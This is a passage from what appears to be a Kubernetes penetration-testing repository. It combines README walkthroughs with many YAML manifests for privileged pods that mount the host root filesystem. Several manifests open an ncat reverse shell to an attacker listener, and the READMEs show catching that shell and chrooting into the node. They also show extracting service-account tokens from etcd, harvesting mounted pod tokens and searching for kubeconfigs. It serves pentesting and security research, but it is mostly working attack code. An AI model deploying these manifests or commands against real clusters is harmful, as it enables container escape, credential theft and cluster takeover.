everything-allowed-exec-[RESOURCE_TYPE]-[ID] -- chroot /host bash 39 | ``` 40 | 41 | *Keep in mind that if pod security policy blocks the pod, the resource type will still get created. The admission controller only blocks the pods that are created by the resource type.* 42 | 43 | To troubleshoot a case where you don't see pods, use `kubectl describe` 44 | 45 | ``` 46 | kubectl describe everything-allowed-exec-[RESOURCE_TYPE] 47 | ``` 48 | 49 | ## Reverse shell pods 50 | Create one or more of these resources and catch the reverse shell 51 | 52 | **Step 1: Set up listener** 53 | ```bash 54 | ncat --ssl -vlp 3116 55 | ``` 56 | 57 | **Step 2: Create pod from local manifest without modifying it by using env variables and envsubst** 58 | 59 | * Replace [RESOURCE_TYPE] with deployment, statefulset, job, etc. 60 | * Replace the HOST and PORT values to point the reverse shell to your listener 61 | 62 | ```bash 63 | HOST="10.0.0.1" PORT="3116" envsubst < ./manifests/everything-allowed/[RESOURCE_TYPE]/everything-allowed-revshell-[RESOURCE_TYPE].yaml | kubectl apply -f - 64 | ``` 65 | 66 | **Step 3: Catch the shell and chroot to /host** 67 | ```bash 68 | $ ncat --ssl -vlp 3116 69 | Ncat: Generating a temporary 2048-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one. 70 | Ncat: Listening on :::3116 71 | Ncat: Listening on 0.0.0.0:3116 72 | Connection received on 10.0.0.162 42035 73 | # chroot /host 74 | ``` 75 | 76 | ## Deleting resources 77 | You can delete a resource using it's manifest, or by name. Here are some examples: 78 | ``` 79 | kubectl delete [type] [resource-name] 80 | kubectl delete -f manifests/everything-allowed/pod/everything-allowed-exec-pod.yaml 81 | kubectl delete -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/everything-allowed/pod/everything-allowed-exec-pod.yaml 82 | kubectl delete pod everything-allowed-exec-pod 83 | kubectl delete cronjob everything-allowed-exec-cronjob 84 | ``` 85 | 86 | # Post exploitation 87 | 88 | ## Can you run your pod on a control-plane node 89 | The pod you created above was likely scheduled on a worker node. Before jumping into post exploitation on the worker node, it is worth seeing if you run your a pod on a control-plane node. If you can run your pod on a control-plane node using the nodeName selector in the pod spec, you might have easy access to the etcd database, which contains all of the configuration for the cluster, including all secrets. This is not a possible on cloud managed Kubernetes clusters like GKE and EKS - they hide the control-plane. 90 | 91 | **Get nodes** 92 | ``` 93 | kubectl get nodes 94 | NAME STATUS ROLES AGE VERSION 95 | k8s-control-plane Ready master 93d v1.19.1 96 | k8s-worker Ready 93d v1.19.1 97 | ``` 98 | 99 | **Pick your manifest, uncomment and update the nodeName field with the name of the control-plane node** 100 | ``` 101 | nodeName: k8s-control-plane 102 | ``` 103 | **Create your pod** 104 | ``` 105 | kubectl apply -f manifests/everything-allowed/job/everything-allowed-exec-job.yaml 106 | ``` 107 | 108 | ### Read secrets from etcd 109 | If you can run your pod on a control-plane node using the `nodeName` selector in the pod spec, you might have easy access to the `etcd` database, which contains all of the configuration for the cluster, including all secrets. 110 | 111 | Below is a quick and dirty way to grab secrets from `etcd` if it is running on the control-plane node you are on. If you want a more elegant solution that spins up a pod with the `etcd` client utility `etcdctl` and uses the control-plane node's credentials to connect to etcd wherever it is running, check out [this example manifest](https://github.com/mauilion/blackhat-2019/blob/master/etcd-attack/etcdclient.yaml) from @mauilion. 112 | 113 | **Check to see if `etcd` is running on the control-plane node and see where the database is (This is on a `kubeadm` created cluster)** 114 | ``` 115 | root@k8s-control-plane:/var/lib/etcd/member/wal# ps -ef | grep etcd | sed s/\-\-/\\n/g | grep data-dir 116 | ``` 117 | Output: 118 | ``` 119 | data-dir=/var/lib/etcd 120 | ``` 121 | **View the data in etcd database:** 122 | ``` 123 | strings /var/lib/etcd/member/snap/db | less 124 | ``` 125 | 126 | **Extract the tokens from the database and show the service account name** 127 | ``` 128 | db=`strings /var/lib/etcd/member/snap/db`; for x in `echo "$db" | grep eyJhbGciOiJ`; do name=`echo "$db" | grep $x -B40 | grep registry`; echo $name \| $x; echo; done 129 | ``` 130 | 131 | **Same command, but some greps to only return the default token in the kube-system namespace** 132 | ``` 133 | db=`strings /var/lib/etcd/member/snap/db`; for x in `echo "$db" | grep eyJhbGciOiJ`; do name=`echo "$db" | grep $x -B40 | grep registry`; echo $name \| $x; echo; done | grep kube-system | grep default 134 | ``` 135 | Output: 136 | ``` 137 | 1/registry/secrets/kube-system/default-token-d82kb | eyJhbGciOiJSUzI1NiIsImtpZCI6IkplRTc0X2ZP[REDACTED] 138 | ``` 139 | 140 | 141 | ## Look for kubeconfigs in the host filesystem 142 | 143 | By default, nodes don't have `kubectl` installed. If you are lucky though, an administrator tried to make their life (and yours) a little easier by installing `kubectl` and their highly privileged credentials on the node. We're not so lucky on this GKE node 144 | 145 | **Some ideas:** 146 | ```bash 147 | find / -name kubeconfig 148 | find / -name .kube 149 | grep -R "current-context" /home/ 150 | grep -R "current-context" /root/ 151 | ``` 152 | 153 | ## Grab all tokens from all pods on the system 154 | You can access any secret mounted within any pod on the node you are on. In a production cluster, even on a worker node, there is usually at least one pod that has a mounted *token* that is bound to a *service account* that is bound to a *clusterrolebinding*, which gives you access to do things like create pods or view secrets in all namespaces. 155 | 156 | Look for tokens that have permissions to get secrets in kube-system. 157 | 158 | **Copy the `can-they.sh` helper script to the pod, download it from github, or manually create it** 159 | ``` 160 | kubectl cp scripts/can-they.sh everything-allowed-exec-pod:/ 161 | ``` 162 | 163 | **What does `can-they.sh` do?** 164 | 165 | * Installs curl and kubectl in the pod (if not installed) 166 | * Grabs all of the tokens from `/host/var/lib/kubelet/pods/*` 167 | * Loops each token against the `selfsubjectaccessreviews` endpoint: `kubectl --token=$token auth can-i [$user-input]` 168 | 169 | **Exec into pod (Don't chroot)** 170 | ``` 171 | kubectl exec -it everything-allowed-exec-pod -- bash 172 | chmod +x can-they.sh 173 | ``` 174 | 175 | **Run `can-they.sh`** 176 | ``` 177 | ./can-they.sh 178 | ./can-they.sh -i "--list -n kube-system" 179 | ./can-they.sh -i "--list -n default" 180 | ./can-they.sh -i "list secrets -n kube-system" 181 | ./can-they.sh -i "create pods -n kube-system" 182 | ./can-they.sh -i "create clusterrolebindings" 183 | ``` 184 | 185 | **Example Run on AKS showing gatekeeper-admin-token-jmw8z can list secrets in kube-system** 186 | ``` 187 | root@aks-agentpool-76920337-vmss000000:/# ./can-they.sh -i "list secrets -n kube-system" 188 | -------------------------------------------------------- 189 | Token Location: /host/var/lib/kubelet/pods/c888d3a8-743e-41dd-8464-91b3e6628174/volumes/kubernetes.io~secret/gatekeeper-admin-token-jmw8z/token 190 | Command: kubectl auth can-i list secrets -n kube-system 191 | yes 192 | 193 | -------------------------------------------------------- 194 | Token Location: /host/var/lib/kubelet/pods/d13e311b-affa-4fad-b1c4-ec4f7817fd98/volumes/kubernetes.io~secret/metrics-server-token-ftxxd/token 195 | Command: kubectl auth can-i list secrets -n kube-system 196 | no 197 | 198 | ...omitted for brevity... 199 | ``` 200 | 201 | **Can any of the tokens:** 202 | * Create a pod, deployment, etc. in the kube-system namespace? 203 | * Create a role in the kube-system namespace? 204 | * View secrets in the kube-system namespace? 205 | * Create clusterrolebindings? 206 | 207 | You are looking for a way to access to all resources in all namespaces. 208 | 209 | 210 | ## Some other ideas 211 | * Add your public key authorized_keys on the node and ssh to it 212 | * Crack passwords in /etc/shadow, see if you can use them to access control-plane nodes 213 | * Look at the volumes that each of the pods have mounted. You might find some pretty sensitive stuff in there. 214 | 215 | ## Attacks that apply to all pods, even without any special permissions 216 | 217 | **To see these in more detail, head over to [nothing-allowed/README.md](../nothing-allowed)** 218 | 219 | * Access the cloud metadata service 220 | * `Kube-apiserver` or `kubelet` with `anonymous-auth` enabled 221 | * Kubernetes exploits 222 | * Hunting for vulnerable application/services in the cluster 223 | 224 | 225 | # Demonstrate impact 226 | 227 | If you are performing a penetration test, the end goal is not to gain cluster-admin, but rather to demonstrate the impact of exploitation. Use the access you have gained to accomplish the objectives of the penetration test. 228 | 229 | 230 | # References and further reading: 231 | * [The Most Pointless Kubernetes Command Ever](https://raesene.github.io/blog/2019/04/01/The-most-pointless-kubernetes-command-ever/) 232 | * [Secure Kubernetes - KubeCon NA 2019 CTF](https://securekubernetes.com/) 233 | * Command and KubeCTL: Real-World Kubernetes Security for Pentesters - [Talk](https://www.youtube.com/watch?v=cRbHILH4f0A) / [Blog](https://research.nccgroup.com/2020/02/12/command-and-kubectl-talk-follow-up/) 234 | * Compromising Kubernetes Cluster by Exploiting RBAC Permissions - [Talk](https://www.youtube.com/watch?v=1LMo0CftVC4) / [Slides](https://published-prd.lanyonevents.com/published/rsaus20/sessionsFiles/18100/2020_USA20_DSO-W01_01_Compromising%20Kubernetes%20Cluster%20by%20Exploiting%20RBAC%20Permissions.pdf) 235 | * The Path Less Traveled: Abusing Kubernetes Defaults - [Talk](https://www.youtube.com/watch?v=HmoVSmTIOxM) / [Repository](https://github.com/mauilion/blackhat-2019) 236 | 237 | -------------------------------------------------------------------------------- /manifests/everything-allowed/cronjob/everything-allowed-exec-cronjob.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: batch/v1beta1 2 | kind: CronJob 3 | metadata: 4 | name: everything-allowed-exec-cronjob 5 | labels: 6 | app: pentest 7 | type: cronjob 8 | spec: 9 | schedule: "*/1 * * * *" 10 | concurrencyPolicy: Forbid 11 | jobTemplate: 12 | spec: 13 | template: 14 | spec: 15 | hostNetwork: true 16 | hostPID: true 17 | hostIPC: true 18 | containers: 19 | - name: everything-allowed-exec-cronjob 20 | image: ubuntu 21 | securityContext: 22 | privileged: true 23 | volumeMounts: 24 | - mountPath: /host 25 | name: noderoot 26 | command: [ "/bin/sh", "-c", "--" ] 27 | args: [ "while true; do sleep 30; done;" ] 28 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 29 | volumes: 30 | - name: noderoot 31 | hostPath: 32 | path: / 33 | restartPolicy: OnFailure 34 | -------------------------------------------------------------------------------- /manifests/everything-allowed/cronjob/everything-allowed-revshell-cronjob.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: batch/v1beta1 2 | kind: CronJob 3 | metadata: 4 | name: everything-allowed-revshell-cronjob 5 | labels: 6 | app: pentest 7 | spec: 8 | schedule: "*/1 * * * *" 9 | concurrencyPolicy: Forbid 10 | jobTemplate: 11 | spec: 12 | template: 13 | spec: 14 | hostNetwork: true 15 | hostPID: true 16 | hostIPC: true 17 | containers: 18 | - name: everything-allowed-revshell-cronjob 19 | image: raesene/ncat 20 | command: [ "/bin/sh", "-c", "--" ] 21 | args: [ "ncat --ssl $HOST $PORT -e /bin/bash;" ] 22 | securityContext: 23 | privileged: true 24 | volumeMounts: 25 | - mountPath: /host 26 | name: noderoot 27 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 28 | volumes: 29 | - name: noderoot 30 | hostPath: 31 | path: / 32 | restartPolicy: OnFailure 33 | -------------------------------------------------------------------------------- /manifests/everything-allowed/deamonset/everything-allowed-exec-deamonset.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: apps/v1 2 | kind: DaemonSet 3 | metadata: 4 | name: everything-allowed-exec-daemonset 5 | labels: 6 | app: pentest 7 | type: daemonset 8 | spec: 9 | selector: 10 | matchLabels: 11 | app: pentest 12 | type: daemonset 13 | template: 14 | metadata: 15 | labels: 16 | app: pentest 17 | type: daemonset 18 | spec: 19 | hostNetwork: true 20 | hostPID: true 21 | hostIPC: true 22 | containers: 23 | - name: everything-allowed-exec-daemonset 24 | image: ubuntu 25 | securityContext: 26 | privileged: true 27 | volumeMounts: 28 | - mountPath: /host 29 | name: noderoot 30 | command: [ "/bin/sh", "-c", "--" ] 31 | args: [ "while true; do sleep 30; done;" ] 32 | #nodeName: k8s-control-plane # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 33 | volumes: 34 | - name: noderoot 35 | hostPath: 36 | path: / 37 | 38 | -------------------------------------------------------------------------------- /manifests/everything-allowed/deamonset/everything-allowed-revshell-deamonset.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: apps/v1 2 | kind: DaemonSet 3 | metadata: 4 | name: everything-allowed-revshell-daemonset 5 | labels: 6 | app: pentest 7 | type: daemonset 8 | spec: 9 | selector: 10 | matchLabels: 11 | app: pentest 12 | type: daemonset 13 | template: 14 | metadata: 15 | labels: 16 | app: pentest 17 | type: daemonset 18 | spec: 19 | hostNetwork: true 20 | hostPID: true 21 | hostIPC: true 22 | containers: 23 | - name: everything-allowed-revshell-daemonset 24 | image: raesene/ncat 25 | command: [ "/bin/sh", "-c", "--" ] 26 | args: [ "ncat --ssl $HOST $PORT -e /bin/bash;" ] 27 | securityContext: 28 | privileged: true 29 | volumeMounts: 30 | - mountPath: /host 31 | name: noderoot 32 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 33 | volumes: 34 | - name: noderoot 35 | hostPath: 36 | path: / 37 | -------------------------------------------------------------------------------- /manifests/everything-allowed/deployment/everything-allowed-exec-deployment.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: apps/v1 2 | kind: Deployment 3 | metadata: 4 | name: everything-allowed-exec-deployment 5 | labels: 6 | app: pentest 7 | type: deployment 8 | spec: 9 | replicas: 2 10 | selector: 11 | matchLabels: 12 | app: pentest 13 | type: deployment 14 | template: 15 | metadata: 16 | labels: 17 | app: pentest 18 | type: deployment 19 | spec: 20 | hostNetwork: true 21 | hostPID: true 22 | hostIPC: true 23 | containers: 24 | - name: everything-allowed-exec-deployment 25 | image: ubuntu 26 | securityContext: 27 | privileged: true 28 | volumeMounts: 29 | - mountPath: /host 30 | name: noderoot 31 | command: [ "/bin/sh", "-c", "--" ] 32 | args: [ "while true; do sleep 30; done;" ] 33 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 34 | volumes: 35 | - name: noderoot 36 | hostPath: 37 | path: / 38 | -------------------------------------------------------------------------------- /manifests/everything-allowed/deployment/everything-allowed-revshell-deployment.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: apps/v1 2 | kind: Deployment 3 | metadata: 4 | name: everything-allowed-revshell-deployment 5 | labels: 6 | app: pentest 7 | type: deployment 8 | spec: 9 | replicas: 2 10 | selector: 11 | matchLabels: 12 | app: pentest 13 | type: deployment 14 | template: 15 | metadata: 16 | labels: 17 | app: pentest 18 | type: deployment 19 | spec: 20 | hostNetwork: true 21 | hostPID: true 22 | hostIPC: true 23 | containers: 24 | - name: everything-allowed-revshell-deployment 25 | image: raesene/ncat 26 | command: [ "/bin/sh", "-c", "--" ] 27 | args: [ "ncat --ssl $HOST $PORT -e /bin/bash;" ] 28 | securityContext: 29 | privileged: true 30 | volumeMounts: 31 | - mountPath: /host 32 | name: noderoot 33 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 34 | volumes: 35 | - name: noderoot 36 | hostPath: 37 | path: / 38 | -------------------------------------------------------------------------------- /manifests/everything-allowed/job/everything-allowed-exec-job.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: batch/v1 2 | kind: Job 3 | metadata: 4 | name: everything-allowed-exec-job 5 | labels: 6 | app: pentest 7 | type: job 8 | spec: 9 | template: 10 | spec: 11 | hostNetwork: true 12 | hostPID: true 13 | hostIPC: true 14 | containers: 15 | - name: everything-allowed-exec-job 16 | image: ubuntu 17 | securityContext: 18 | privileged: true 19 | volumeMounts: 20 | - mountPath: /host 21 | name: noderoot 22 | command: [ "/bin/sh", "-c", "--" ] 23 | args: [ "while true; do sleep 30; done;" ] 24 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 25 | volumes: 26 | - name: noderoot 27 | hostPath: 28 | path: / 29 | restartPolicy: OnFailure 30 | -------------------------------------------------------------------------------- /manifests/everything-allowed/job/everything-allowed-revshell-job.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: batch/v1 2 | kind: Job 3 | metadata: 4 | name: everything-allowed-revshell-job 5 | labels: 6 | app: pentest 7 | type: job 8 | spec: 9 | template: 10 | spec: 11 | hostNetwork: true 12 | hostPID: true 13 | hostIPC: true 14 | containers: 15 | - name: everything-allowed-revshell-job 16 | image: raesene/ncat 17 | command: [ "/bin/sh", "-c", "--" ] 18 | args: [ "ncat --ssl $HOST $PORT -e /bin/bash;" ] 19 | securityContext: 20 | privileged: true 21 | volumeMounts: 22 | - mountPath: /host 23 | name: noderoot 24 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 25 | volumes: 26 | - name: noderoot 27 | hostPath: 28 | path: / 29 | restartPolicy: OnFailure 30 | -------------------------------------------------------------------------------- /manifests/everything-allowed/pod/everything-allowed-exec-pod.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: Pod 3 | metadata: 4 | name: everything-allowed-exec-pod 5 | labels: 6 | app: pentest 7 | spec: 8 | hostNetwork: true 9 | hostPID: true 10 | hostIPC: true 11 | containers: 12 | - name: everything-allowed-pod 13 | image: ubuntu 14 | securityContext: 15 | privileged: true 16 | volumeMounts: 17 | - mountPath: /host 18 | name: noderoot 19 | command: [ "/bin/sh", "-c", "--" ] 20 | args: [ "while true; do sleep 30; done;" ] 21 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 22 | volumes: 23 | - name: noderoot 24 | hostPath: 25 | path: / 26 | -------------------------------------------------------------------------------- /manifests/everything-allowed/pod/everything-allowed-revshell-pod.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: Pod 3 | metadata: 4 | name: everything-allowed-revshell-pod 5 | labels: 6 | app: pentest 7 | spec: 8 | hostNetwork: true 9 | hostPID: true 10 | hostIPC: true 11 | containers: 12 | - name: everything-allowed-pod 13 | image: raesene/ncat 14 | command: [ "/bin/sh", "-c", "--" ] 15 | args: [ "ncat --ssl $HOST $PORT -e /bin/bash;" ] 16 | securityContext: 17 | privileged: true 18 | volumeMounts: 19 | - mountPath: /host 20 | name: noderoot 21 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 22 | volumes: 23 | - name: noderoot 24 | hostPath: 25 | path: / 26 | -------------------------------------------------------------------------------- /manifests/everything-allowed/replicaset/everything-allowed-exec-replicaset.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: apps/v1 2 | kind: ReplicaSet 3 | metadata: 4 | name: everything-allowed-exec-replicaset 5 | labels: 6 | app: pentest 7 | type: replicaset 8 | spec: 9 | replicas: 2 10 | selector: 11 | matchLabels: 12 | type: replicaset 13 | template: 14 | metadata: 15 | labels: 16 | app: pentest 17 | type: replicaset 18 | spec: 19 | hostNetwork: true 20 | hostPID: true 21 | hostIPC: true 22 | containers: 23 | - name: everything-allowed-exec-replicaset 24 | image: ubuntu 25 | securityContext: 26 | privileged: true 27 | volumeMounts: 28 | - mountPath: /host 29 | name: noderoot 30 | command: [ "/bin/sh", "-c", "--" ] 31 | args: [ "while true; do sleep 30; done;" ] 32 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 33 | volumes: 34 | - name: noderoot 35 | hostPath: 36 | path: / 37 | -------------------------------------------------------------------------------- /manifests/everything-allowed/replicaset/everything-allowed-revshell-replicaset.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: apps/v1 2 | kind: ReplicaSet 3 | metadata: 4 | name: everything-allowed-revshell-replicaset 5 | labels: 6 | app: pentest 7 | type: replicaset 8 | spec: 9 | replicas: 2 10 | selector: 11 | matchLabels: 12 | type: replicaset 13 | template: 14 | metadata: 15 | labels: 16 | app: pentest 17 | type: replicaset 18 | spec: 19 | hostNetwork: true 20 | hostPID: true 21 | hostIPC: true 22 | containers: 23 | - name: everything-allowed-revshell-replicaset 24 | image: raesene/ncat 25 | command: [ "/bin/sh", "-c", "--" ] 26 | args: [ "ncat --ssl $HOST $PORT -e /bin/bash;" ] 27 | securityContext: 28 | privileged: true 29 | volumeMounts: 30 | - mountPath: /host 31 | name: noderoot 32 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 33 | volumes: 34 | - name: noderoot 35 | hostPath: 36 | path: / 37 | -------------------------------------------------------------------------------- /manifests/everything-allowed/replicationcontroller/everything-allowed-exec-replicationcontroller.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: ReplicationController 3 | metadata: 4 | name: everything-allowed-exec-replicationcontroller 5 | labels: 6 | app: pentest 7 | type: replicationcontroller 8 | spec: 9 | replicas: 2 10 | selector: 11 | app: pentest 12 | type: replicationcontroller 13 | template: 14 | metadata: 15 | labels: 16 | app: pentest 17 | type: replicationcontroller 18 | spec: 19 | hostNetwork: true 20 | hostPID: true 21 | hostIPC: true 22 | containers: 23 | - name: everything-allowed-exec-replicationcontroller 24 | image: ubuntu 25 | securityContext: 26 | privileged: true 27 | volumeMounts: 28 | - mountPath: /host 29 | name: noderoot 30 | command: [ "/bin/sh", "-c", "--" ] 31 | args: [ "while true; do sleep 30; done;" ] 32 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 33 | volumes: 34 | - name: noderoot 35 | hostPath: 36 | path: / 37 | -------------------------------------------------------------------------------- /manifests/everything-allowed/replicationcontroller/everything-allowed-revshell-replicationcontroller.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: ReplicationController 3 | metadata: 4 | name: everything-allowed-revshell-replicationcontroller 5 | labels: 6 | app: pentest 7 | type: replicationcontroller 8 | spec: 9 | replicas: 2 10 | selector: 11 | app: pentest 12 | type: replicationcontroller 13 | template: 14 | metadata: 15 | labels: 16 | app: pentest 17 | type: replicationcontroller 18 | spec: 19 | hostNetwork: true 20 | hostPID: true 21 | hostIPC: true 22 | containers: 23 | - name: everything-allowed-revshell-replicationcontroller 24 | image: raesene/ncat 25 | command: [ "/bin/sh", "-c", "--" ] 26 | args: [ "ncat --ssl $HOST $PORT -e /bin/bash;" ] 27 | securityContext: 28 | privileged: true 29 | volumeMounts: 30 | - mountPath: /host 31 | name: noderoot 32 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 33 | volumes: 34 | - name: noderoot 35 | hostPath: 36 | path: / 37 | -------------------------------------------------------------------------------- /manifests/everything-allowed/statefulset/everything-allowed-exec-statefulset.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: Service 3 | metadata: 4 | name: everything-allowed-exec-statefulset-service 5 | labels: 6 | app: pentest 7 | spec: 8 | ports: 9 | - port: 4444 10 | name: everything-allowed-exec-statefulset-service 11 | clusterIP: None 12 | selector: 13 | app: pentest 14 | --- 15 | apiVersion: apps/v1 16 | kind: StatefulSet 17 | metadata: 18 | name: everything-allowed-exec-statefulset 19 | labels: 20 | app: pentest 21 | type: statefulset 22 | spec: 23 | serviceName: "pentest" 24 | replicas: 2 25 | selector: 26 | matchLabels: 27 | app: pentest 28 | type: statefulset 29 | template: 30 | metadata: 31 | labels: 32 | app: pentest 33 | type: statefulset 34 | spec: 35 | hostNetwork: true 36 | hostPID: true 37 | hostIPC: true 38 | containers: 39 | - name: everything-allowed-exec-statefulset 40 | image: ubuntu 41 | securityContext: 42 | privileged: true 43 | volumeMounts: 44 | - mountPath: /host 45 | name: noderoot 46 | command: [ "/bin/sh", "-c", "--" ] 47 | args: [ "while true; do sleep 30; done;" ] 48 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 49 | volumes: 50 | - name: noderoot 51 | hostPath: 52 | path: / 53 | -------------------------------------------------------------------------------- /manifests/everything-allowed/statefulset/everything-allowed-revshell-statefulset.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: Service 3 | metadata: 4 | name: everything-allowed-revshell-statefulset-service 5 | labels: 6 | app: pentest 7 | spec: 8 | ports: 9 | - port: 4444 10 | name: everything-allowed-revshell-statefulset-service 11 | clusterIP: None 12 | selector: 13 | app: pentest 14 | --- 15 | apiVersion: apps/v1 16 | kind: StatefulSet 17 | metadata: 18 | name: everything-allowed-revshell-statefulset 19 | labels: 20 | app: pentest 21 | type: statefulset 22 | spec: 23 | serviceName: "pentest" 24 | replicas: 2 25 | selector: 26 | matchLabels: 27 | app: pentest 28 | type: statefulset 29 | template: 30 | metadata: 31 | labels: 32 | app: pentest 33 | type: statefulset 34 | spec: 35 | hostNetwork: true 36 | hostPID: true 37 | hostIPC: true 38 | containers: 39 | - name: everything-allowed-revshell-statefulset 40 | image: raesene/ncat 41 | command: [ "/bin/sh", "-c", "--" ] 42 | args: [ "ncat --ssl $HOST $PORT -e /bin/bash;" ] 43 | securityContext: 44 | privileged: true 45 | volumeMounts: 46 | - mountPath: /host 47 | name: noderoot 48 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 49 | volumes: 50 | - name: noderoot 51 | hostPath: 52 | path: / 53 | -------------------------------------------------------------------------------- /manifests/hostipc/README.md: -------------------------------------------------------------------------------- 1 | # Bad Pod #7: hostIPC 2 | ![](../../.github/images/Pod7.jpg) 3 | 4 | If you only have `hostIPC=true`, you most likely can't do much. If any process on the host or any processes within another pod is using the host’s inter-process communication mechanisms (shared memory, semaphore arrays, message queues, etc.), you'll be able to read/write to those same mechanisms. The first place you'll want to look is `/dev/shm`, as it is shared between any pod with `hostIPC=true` and the host. You'll also want to check out the other IPC mechanisms with `ipcs`. 5 | 6 | * **Inspect /dev/shm** - Look for any files in this shared memory location. 7 | * **Inspect existing IPC facilities** – You can check to see if any IPC facilities are being used with `/usr/bin/ipcs`. 8 | 9 | 10 | ## Table of Contents 11 | - [Pod creation & access](#pod-creation--access) 12 | - [Exec pods](#exec-pods) 13 | - [Reverse shell pods](#reverse-shell-pods) 14 | - [Deleting resources](#deleting-resources) 15 | - [Post exploitation](#post-exploitation) 16 | - [Inspect /dev/shm - Look for any files in this shared memory location.](#inspect-devshm---look-for-any-files-in-this-shared-memory-location) 17 | - [Look for any use of inter-process communication on the host](#look-for-any-use-of-inter-process-communication-on-the-host) 18 | - [Attacks that apply to all pods, even without any special permissions](#attacks-that-apply-to-all-pods-even-without-any-special-permissions) 19 | - [Demonstrate impact](#demonstrate-impact) 20 | - [References and further reading:](#references-and-further-reading) 21 | 22 | # Pod creation & access 23 | 24 | ## Exec pods 25 | Create one or more of these resource types and exec into the pod 26 | 27 | **Pod** 28 | ```bash 29 | kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/hostipc/pod/hostipc-exec-pod.yaml 30 | kubectl exec -it hostipc-exec-pod -- bash 31 | ``` 32 | **Job, CronJob, Deployment, StatefulSet, ReplicaSet, ReplicationController, DaemonSet** 33 | 34 | * Replace [RESOURCE_TYPE] with deployment, statefulset, job, etc. 35 | 36 | ```bash 37 | kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/hostipc/[RESOURCE_TYPE]/hostipc-exec-[RESOURCE_TYPE].yaml 38 | kubectl get pods | grep hostipc-exec-[RESOURCE_TYPE] 39 | kubectl exec -it hostipc-exec-[RESOURCE_TYPE]-[ID] -- bash 40 | ``` 41 | 42 | *Keep in mind that if pod security policy blocks the pod, the resource type will still get created. The admission controller only blocks the pods that are created by the resource type.* 43 | 44 | To troubleshoot a case where you don't see pods, use `kubectl describe` 45 | 46 | ``` 47 | kubectl describe hostipc-exec-[RESOURCE_TYPE] 48 | ``` 49 | 50 | ## Reverse shell pods 51 | Create one or more of these resources and catch the reverse shell 52 | 53 | **Step 1: Set up listener** 54 | ```bash 55 | ncat --ssl -vlp 3116 56 | ``` 57 | 58 | **Step 2: Create pod from local manifest without modifying it by using env variables and envsubst** 59 | 60 | * Replace [RESOURCE_TYPE] with deployment, statefulset, job, etc. 61 | * Replace the HOST and PORT values to point the reverse shell to your listener 62 | * 63 | ```bash 64 | HOST="10.0.0.1" PORT="3116" envsubst < ./manifests/hostipc/[RESOURCE_TYPE]/hostipc-revshell-[RESOURCE_TYPE].yaml | kubectl apply -f - 65 | ``` 66 | 67 | **Step 3: Catch the shell** 68 | ```bash 69 | $ ncat --ssl -vlp 3116 70 | Ncat: Generating a temporary 2048-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one. 71 | Ncat: Listening on :::3116 72 | Ncat: Listening on 0.0.0.0:3116 73 | Connection received on 10.0.0.162 42035 74 | ``` 75 | 76 | ## Deleting resources 77 | You can delete a resource using it's manifest, or by name. Here are some examples: 78 | ``` 79 | kubectl delete [type] [resource-name] 80 | kubectl delete -f manifests/hostipc/pod/hostipc-exec-pod.yaml 81 | kubectl delete -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/hostipc/pod/hostipc-exec-pod.yaml 82 | kubectl delete pod hostipc-exec-pod 83 | kubectl delete cronjob hostipc-exec-cronjob 84 | ``` 85 | 86 | # Post exploitation 87 | 88 | ## Inspect /dev/shm - Look for any files in this shared memory location 89 | 90 | For a super simple POC, I have created a secret file in /dev/shm on the worker node 91 | ``` 92 | root@k8s-worker:/# echo "secretpassword=BishopFox" > /dev/shm/secretpassword.txt 93 | ``` 94 | 95 | 96 | From the hostIPC pod, we can list all files in /dev/shm 97 | ``` 98 | root@hostipc-exec-pod:/# ls -al /dev/shm/ 99 | total 4 100 | drwxrwxrwt 3 root root 80 Dec 22 15:11 . 101 | drwxr-xr-x 5 root root 360 Dec 21 20:01 .. 102 | drwx------ 4 root root 80 Sep 9 20:10 multipath 103 | -rw-r--r-- 1 root root 25 Dec 22 15:11 secretpassword.txt 104 | ``` 105 